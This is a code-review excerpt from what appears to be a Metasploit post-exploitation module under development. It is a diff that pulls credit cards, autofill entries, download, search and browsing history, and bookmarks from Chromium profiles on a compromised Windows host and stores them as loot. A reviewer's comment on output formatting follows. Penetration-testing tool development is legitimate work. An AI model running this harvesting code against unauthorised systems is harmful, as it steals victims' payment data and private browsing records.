modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,896 @@
+      extract_sql_data(credit_card_data_path, 'SELECT * FROM credit_cards', 'Credit Cards', browser, encryption_key)
+    elsif datastore['VERBOSE']
+      print_error("Credit Cards not found at #{credit_card_data_path}")
+    end
+  end
+
+  def process_chromium_download_history(profile_path, browser)
+    download_history_path = "#{profile_path}\\History"
+    if file?(download_history_path)
+      extract_sql_data(download_history_path, 'SELECT * FROM downloads', 'Download History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Download History not found at #{download_history_path}")
+    end
+  end
+
+  def process_chromium_autofill_data(profile_path, browser)
+    autofill_data_path = "#{profile_path}\\Web Data"
+    if file?(autofill_data_path)
+      extract_sql_data(autofill_data_path, 'SELECT * FROM autofill', 'Autofill Data', browser)
+    elsif datastore['VERBOSE']
+      print_error("Autofill data not found at #{autofill_data_path}")
+    end
+  end
+
+  def process_chromium_keyword_search_history(profile_path, browser)
+    keyword_search_history_path = "#{profile_path}\\History"
+    if file?(keyword_search_history_path)
+      extract_sql_data(keyword_search_history_path, 'SELECT term FROM keyword_search_terms', 'Keyword Search History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Keyword Search History not found at #{keyword_search_history_path}")
+    end
+  end
+
+  def process_chromium_browsing_history(profile_path, browser)
+    browsing_history_path = "#{profile_path}\\History"
+    if file?(browsing_history_path)
+      extract_sql_data(browsing_history_path, 'SELECT url, title, visit_count, last_visit_time FROM urls', 'Browsing History', browser)
+    elsif datastore['VERBOSE']
+      print_error("Browsing History not found at #{browsing_history_path}")
+    end
+  end
+
+  def process_chromium_bookmarks(profile_path, browser)
+    bookmarks_path = "#{profile_path}\\Bookmarks"
+    return unless file?(bookmarks_path)
+
+    bookmarks_data = read_file(bookmarks_path)
+    bookmarks_json = JSON.parse(bookmarks_data)
+
+    bookmarks = []
+    if bookmarks_json['roots']['bookmark_bar']
+      traverse_and_collect_bookmarks(bookmarks_json['roots']['bookmark_bar'], bookmarks)
+    end
+    if bookmarks_json['roots']['other']
+      traverse_and_collect_bookmarks(bookmarks_json['roots']['other'], bookmarks)
+    end
+
+    browser_clean = browser.gsub('\\', '_').chomp('_')
+    timestamp = Time.now.strftime('%Y%m%d%H%M')
+    ip = session.sock.peerhost
+
+    if bookmarks.any?
+      bookmark_entries = bookmarks.map { |bookmark| "#{bookmark[:name]}: #{bookmark[:url]}" }.join("\n")
+      file_name = store_loot("#{browser_clean}_Bookmarks", 'text/plain', session, bookmark_entries, "#{timestamp}_#{ip}_#{browser_clean}_Bookmarks.txt", "#{browser_clean} Bookmarks")
+      file_size = ::File.size(file_name)
+      print_good("└ Extracted Bookmarks to #{file_name} (#{file_size} bytes)")
```

Comment:
If you're happy with the feedback on the extract_sql_data method, it'd be good to update these other methods to follow suit - i.e. generating json with column names, giving entry counts, and having the noun at the start of the sentence - so your eye can filter out the important parts first